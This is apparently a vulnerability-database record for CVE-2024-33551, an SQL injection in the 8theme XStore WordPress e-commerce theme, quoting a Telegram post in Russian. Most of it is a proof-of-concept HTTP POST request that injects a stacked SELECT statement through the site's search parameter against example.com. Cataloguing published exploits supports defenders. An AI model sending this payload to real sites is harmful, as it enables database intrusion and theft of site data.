{"uuid": "a2e63225-9ac6-4102-b1a8-148141eb8407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-33551", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/228", "content": "CVE-2024-33551\n\u26d4\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SQL inj, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0432 8theme XStore, \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0439 \u043d\u0430 \u0431\u0430\u0437\u0435 WordPress. \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b SQL \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\nPOC\nPOST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1", "creation_timestamp": "2024-05-17T14:08:04.000000Z"}